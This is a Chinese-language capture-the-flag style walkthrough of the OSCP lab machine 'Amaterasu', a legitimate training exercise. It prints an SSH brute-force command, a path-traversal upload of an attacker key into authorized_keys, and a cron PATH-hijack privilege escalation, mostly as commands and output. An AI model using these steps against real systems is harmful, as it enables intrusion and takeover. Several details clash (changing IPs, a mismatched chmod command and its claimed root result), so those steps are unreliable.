OSCP靶场保姆级系列-Esay-Amaterasu

文摘   其他   2023-07-23 12:38   上海  

OSCP-Esay难度-Amaterasu

准备工作

启动VPN

启动靶机

目标确认

获取目标机器IP > 192.168.244.249

利用ip a 获取攻击机IP > 192.168.45.168

端口收集-端口扫描

目标开放端口收集

  • Nmap开放端口扫描2次

  1. ┌──(rootKali)-[/home/bachang/Amaterasu]

  2. └─# sudo nmap --min-rate 10000 -p- 192.168.244.249

  3. Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 00:08 CST

  4. Nmap scan report for 192.168.244.249

  5. Host is up (0.26s latency).

  6. Not shown: 65524 filtered tcp ports (no-response)

  7. PORT STATE SERVICE

  8. 21/tcp open ftp

  9. 22/tcp closed ssh

  10. 111/tcp closed rpcbind

  11. 139/tcp closed netbios-ssn

  12. 443/tcp closed https

  13. 445/tcp closed microsoft-ds

  14. 2049/tcp closed nfs

  15. 10000/tcp closed snet-sensor-mgmt

  16. 25022/tcp open unknown

  17. 33414/tcp open unknown

  18. 40080/tcp open unknown

[!通过各两次扫描收集到端口 ]
?21,22,111,139,443,445,2049,10000,25022,33414,40080

目标端口对应服务探测

  1. # tcp探测

  2. ┌──(rootKali)-[/home/bachang/Amaterasu]

  3. └─# sudo nmap -sT -sV -O -sC -p21,22,111,139,443,445,2049,10000,25022,33414,40080 192.168.244.249

  4. Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 00:12 CST

  5. Nmap scan report for 192.168.244.249 Host is up (0.26s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3

  6. | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_Can't get directory listing: TIMEOUT | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.45.168 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text

  7. 22/tcp closed ssh

  8. 111/tcp closed rpcbind

  9. 139/tcp closed netbios-ssn

  10. 443/tcp closed https

  11. 445/tcp closed microsoft-ds

  12. 2049/tcp closed nfs

  13. 10000/tcp closed snet-sensor-mgmt

  14. 25022/tcp open ssh OpenSSH 8.6 (protocol 2.0)

  15. | ssh-hostkey:

  16. | 256 68:c6:05:e8:dc:f2:9a:2a:78:9b:ee:a1:ae:f6:38:1a (ECDSA)

  17. |_ 256 e9:89:cc:c2:17:14:f3:bc:62:21:06:4a:5e:71:80:ce (ED25519)

  18. 33414/tcp open unknown

  19. | fingerprint-strings:

  20. | GetRequest:

  21. | HTTP/1.1 404 NOT FOUND

  22. | Server: Werkzeug/2.2.3 Python/3.9.13

  23. | Date: Fri, 21 Jul 2023 16:12:42 GMT

  24. | Content-Type: text/html; charset=utf-8

  25. | Content-Length: 207

  26. | Connection: close

  27. | <!doctype html>

  28. | <html lang=en>

  29. | <title>404 Not Found</title>

  30. 40080/tcp open http Apache httpd 2.4.53 ((Fedora))

  31. | http-methods:

  32. |_ Potentially risky methods: TRACE

  33. |_http-server-header: Apache/2.4.53 (Fedora)

  34. |_http-title: My test page




信息收集-端口测试

总体来看的话,开放了4个端口?
21-ftp、25022-ssh、33414-tcp、40080-http

21-FTP端口的信息收集

21-FTP版本版本信息(确认)

通过Nmap探测获得FTP的版本信息,可以大致推测FTP的配置文件位置

  1. # 如果探测版本为vsftpd 3.0.3

  2. cat /etc/vsftpd.conf

21-FTP端口匿名登录测试(存在)

尝试匿名账号anonymous以及无密码进行登录测试

  1. # 利用ftp协议+ip进行连接测试

  2. ftp 192.168.244.249

  3. Name: anonymous

21-FTP端口-文件GET收集(失败)

登录FTP之后利用ls查看存在哪些目录,翻阅的同时查看一下文件权限
利用GET下载文件

  1. # binary 以二进制模式传输文件,保证文件完整

  2. ftp > binary

  3. # 查看目录结构

  4. ftp > ls -al

进入了扩展模式,没东西

25022-SSH端口的信息收集

目标 ssh 192.168.244.249:25022

25022-SSH弱口令爆破(失败)

尝试root账户的密码爆破,利用工具hydra,线程-t为4

  1. hydra -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.242.249 ssh -t4 -s 25022


放着持续爆破,我们进行下一项内容

25022-SSH手动登录尝试(失败)

尝试root账户的密码爆破发现报错之后进行手动尝试

  1. ┌──(rootKali)-[/home/bachang/Amaterasu]

  2. └─# ssh root@192.168.242.249 -p 25022

  3. root@192.168.242.249's password:

  4. Permission denied, please try again.

33414端口信息收集

http://192.168.242.249:33414

根据nmap探测信息33414是一个tcp协议,可以http访问


当访问了之后发现显示的是不能直接进行访问


这时候简单的进行了chatgpt问答确定Werkzeug是什么,决定使用目录扫描

  1. Werkzeug是一个PythonWSGI工具库,用于构建Web应用程序和框架。Werkzeug提供了一套灵活的工具,用于处理HTTP请求和响应、路由请求、处理会话、进行调试等等。

信息收集-dirsearch基础目录扫描

  1. dirsearch -u http://192.168.242.249:33414 -x 302,403

发现了helpinfo接口

信息收集-dirsearch深度目录扫描(待选)

先看一下helpinfo接口有无信息吧,没有的话可以考虑挂着深度扫描

信息收集-目录访问

  • 在http://192.168.242.249:33414/help端点中发现4个接口信息

  1. 0 "GET /info : General Info"

  2. 1 "GET /help : This listing"

  3. 2 "GET /file-list?dir=/tmp : List of the files"

  4. 3 "POST /file-upload : Upload files"

  • 在http://192.168.242.249:33414/info端点发现了基础信息

40080端口信息收集(待选)

访问 http://192.168.242.249:40080 是火狐的一个界面。首先探索一下33414

漏洞利用-getwebshell

/file-list端点探索

端点/file-list?dir=/tmp下发现了文件信息


/tmp是缓存目录,尝试修改dir到其他目录,发现成功


说明该功能点是具有<mark style="background: #FFB8EBA6;">读取路径</mark>的功能,尝试文件读取,发现失败

/file-upload端点探索

可以确认是一个上传功能点

  1. curl http://192.168.242.249:33414/file-upload

  1. # GET模式不允许的我们改成POST

  2. curl -X POST http://192.168.242.249:33414/file-upload

问了一下chatgpt得到的结论是需要-F "file=@/path/to/file"

  1. # 创建一个文件

  2. ┌──(rootKali)-[/home/bachang/Amaterasu]

  3. └─# touch test.abcd

  4. # 上传

  5. ┌──(rootKali)-[/home/bachang/Amaterasu]

  6. └─# curl -X POST -F file="@/home/bachang/Amaterasu/test.abcd" http://192.168.242.249:33414/file-upload

  7. {"message":"No filename part in the request"}

  1. # No filename part 需要文件名

  2. ┌──(rootKali)-[/home/bachang/Amaterasu]

  3. └─# curl -X POST -F file="@/home/bachang/Amaterasu/test.abcd" -F filename=a http://192.168.242.249:33414/file-upload

  4. {"message":"Allowed file types are txt, pdf, png, jpg, jpeg, gif"}

根据需求尝试进行修改

  1. # 上传的文件名必须符合白名单

  2. ┌──(rootKali)-[/home/bachang/Amaterasu]

  3. └─# curl -X POST -F file="@/home/bachang/Amaterasu/test.txt" -F filename=a.txt http://192.168.242.249:33414/file-upload

  4. {"message":"File successfully uploaded"}

查看了一下文件上传的位置,发现是在/tmp目录下

  1. ┌──(rootKali)-[/home/bachang/Amaterasu]

  2. └─# curl http://192.168.242.249:33414/file-list?dir=/tmp

  3. ["a.txt",....]

端点漏洞利用

如果存在上传以及读取有哪些利用方式呢?
上传可以覆盖一些文件让我们登录,确认是否可以上传目录穿越

  1. ┌──(rootKali)-[/home/bachang/Amaterasu]

  2. └─# curl -X POST -F file="@/home/bachang/Amaterasu/test.txt" -F filename=../a.txt http://192.168.242.249:33414/file-upload

  3. <!doctype html>

  4. <html lang=en>

  5. <title>500 Internal Server Error</title>

  6. <h1>Internal Server Error</h1>

  7. <p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>

错误是无法完成请求,说明尝试写入到根目录中,没有权限

利用路径读取寻找有用的写入点,除了tmp之外应该还有用户权限的地方可以写入

  1. ┌──(rootKali)-[/home/bachang/Amaterasu]

  2. └─# curl http://192.168.242.249:33414/file-list?dir=/home

  3. ["alfredo"]

  4. ┌──(rootKali)-[/home/bachang/Amaterasu]

  5. └─# curl http://192.168.242.249:33414/file-list?dir=/home/alfredo

  6. [".bash_logout",".bash_profile",".bashrc","local.txt",".ssh","restapi",".bash_history"]

  7. ┌──(rootKali)-[/home/bachang/Amaterasu]

  8. └─# curl http://192.168.242.249:33414/file-list?dir=/home/alfredo/.ssh

  9. ["id_rsa","id_rsa.pub"]

发现存在alfredo的用户,存在.ssh的文件夹,可以尝试该文件夹是否可以上传

  1. ┌──(rootKali)-[/home/bachang/Amaterasu]

  2. └─# curl -X POST -F file="@/home/bachang/Amaterasu/test.txt" -F filename=/home/alfredo/.ssh/a.txt http://192.168.242.249:33414/file-upload

  3. {"message":"File successfully uploaded"}

  4. ┌──(rootKali)-[/home/bachang/Amaterasu]

  5. └─# curl http://192.168.242.249:33414/file-list?dir=/home/alfredo/.ssh

  6. ["id_rsa","id_rsa.pub","a.txt"]

考虑上传攻击机的authorized_keysalfredo的用户,进行密钥ssh登录

首先在攻击机上生成对应的密钥对

  1. ssh-keygen -t rsa

  2. ...

  3. ┌──(rootKali)-[/home/bachang/Amaterasu]

  4. └─# ls

  5. text.txt text.txt.pub

接着在文件上传点尝试上传id_rsa_test.pub
利用目录穿越的方式将其上传到/home/alfredo/.ssh/authorized_keys

  1. # 先修改白名单后缀

  2. ┌──(rootKali)-[/home/bachang/Amaterasu]

  3. └─# mv text.txt.pub text.txt.txt

  4. ┌──(rootKali)-[/home/bachang/Amaterasu]

  5. └─# ls

  6. hydra.restore text.txt text.txt.txt

  7. ┌──(rootKali)-[/home/bachang/Amaterasu]

  8. └─# curl -X POST -F file="@/home/bachang/Amaterasu/text.txt.txt" -F filename=/home/alfredo/.ssh/authorized_keys http://192.168.242.249:33414/file-upload

  9. {"message":"File successfully uploaded"}

同时在file-list接口也成功列出来我们上传的公钥文件

内网遨游-getshell

SSH密钥登录

获取密钥之后指定密钥进行登录

  1. ┌──(rootKali)-[/home/bachang/Amaterasu]

  2. └─# ssh -i text.txt alfredo@192.168.242.249 -p25022

  3. Last login: Tue Mar 28 03:21:25 2023

  4. [alfredo@fedora ~]$

FLAG1获取

  1. [alfredo@fedora ~]$ find / -name local.txt 2>/dev/null

  2. /home/alfredo/local.txt

  3. [alfredo@fedora ~]$ cat /home/alfredo/local.txt

  4. *****************************************

权限提升

Linux提权-sudo提权尝试(无)

查找具有sudo权限,且不需要密码的可提权文件

  1. # 利用sudo -l寻找

  2. sudo -l

发现需要密码

Linux提权-suid提权尝试(无)

  1. # -perm 文件权限

  2. [alfredo@fedora ~]$ find / -perm -u=s -type f 2>/dev/null

  3. /usr/bin/fusermount

  4. /usr/bin/chage

  5. /usr/bin/gpasswd

  6. /usr/bin/newgrp

  7. /usr/bin/su

  8. /usr/bin/mount

  9. /usr/bin/umount

  10. /usr/bin/pkexec

  11. /usr/bin/crontab

  12. /usr/bin/fusermount3

  13. /usr/bin/sudo

  14. /usr/bin/passwd

  15. /usr/bin/chfn

  16. /usr/bin/chsh

  17. /usr/bin/at

  18. /usr/bin/staprun

  19. /usr/sbin/grub2-set-bootflag

  20. /usr/sbin/pam_timestamp_check

  21. /usr/sbin/unix_chkpwd

  22. /usr/sbin/mount.nfs

  23. /usr/lib/polkit-1/polkit-agent-helper-1

  24. /usr/libexec/cockpit-session

没找到什么比较好的提权内容

Linux提权-suid-getcap提权尝试(无)

  1. # 探查有CAP_SETUID标志的进程

  2. [alfredo@fedora ~]$ /usr/sbin/getcap -r / 2>/dev/null

  3. /usr/bin/newgidmap cap_setgid=ep

  4. /usr/bin/newuidmap cap_setuid=ep

  5. /usr/bin/arping cap_net_raw=p

  6. /usr/bin/clockdiff cap_net_raw=p

  7. /usr/sbin/suexec cap_setgid,cap_setuid=ep

  8. /usr/sbin/mtr-packet cap_net_raw=ep

Linux提权-Cron job提权尝试

/etc/crontab提权

  1. # 寻找定时任务并修改进行提权

  2. PATH=/sbin:/bin:/usr/sbin:/usr/bin

  3. MAILTO=root

  4. # For details see man 4 crontabs

  5. # Example of job definition:

  6. # .---------------- minute (0 - 59)

  7. # | .------------- hour (0 - 23)

  8. # | | .---------- day of month (1 - 31)

  9. # | | | .------- month (1 - 12) OR jan,feb,mar,apr ...

  10. # | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat

  11. # | | | | |

  12. # * * * * * user-name command to be executed

  13. */1 * * * * root /usr/local/bin/backup-flask.sh

发现每过一分钟会以执行一次backup-flask.sh

  1. # 确定我们是否可以改

  2. [alfredo@fedora ~]$ ls -al cat /usr/local/bin/backup-flask.sh

  3. ls: cannot access 'cat': No such file or directory

  4. -rwxr-xr-x. 1 root root 106 Mar 28 03:18 /usr/local/bin/backup-flask.sh

  5. # 查看内容

  6. [alfredo@fedora ~]$ cat /usr/local/bin/backup-flask.sh

  7. #!/bin/sh

  8. export PATH="/home/alfredo/restapi:$PATH"

  9. cd /home/alfredo/restapi

  10. tar czf /tmp/flask.tar.gz *

backup-flask.sh会将用户下设置成环境变量并且执行一次tar
因为我们用户环境可控,所以我们自己做一个tar的命令进行任务计划帮助提权

可以做一个反弹shell(失败)
提升bash的suid
  1. # 查看bash权限

  2. [alfredo@fedora restapi]$ ls -al /bin/bash

  3. -rwxr-xr-x. 1 root root 1390080 Jan 25 2021 /bin/bash

  4. # 写一个提bash权命令 增加suid

  5. [alfredo@fedora restapi]$ echo "chmod +u+s /bin/bash" > tar

  6. [alfredo@fedora restapi]$ cat tar

  7. chmod 777 /bin/bash

  8. # 增加执行权限

  9. [alfredo@fedora restapi]$ chmod +x tar

  10. [alfredo@fedora restapi]$ cat tar

  11. chmod 777 /bin/bash

  12. [alfredo@fedora restapi]$ ls -al /bin/bash

  13. -rwxrwxrwx. 1 root root 1390080 Jan 25 2021

  14. # 成功提升权限

  15. [alfredo@fedora restapi]$ ls -al /bin/bash

  16. -rwxrwxrwx. 1 root root 1390080 Jan 25 2021 /bin/bash

  17. # bash -p 获得权限

  18. [alfredo@fedora restapi]$ bash -p

  19. bash-5.1# whoami

  20. root

可以把密钥cp到root中直接免密登录(懒)

FLAG2获取

  1. bash-5.1# cat /root/proof.txt

  2. **********************************


云下信安
再溯源就不礼貌了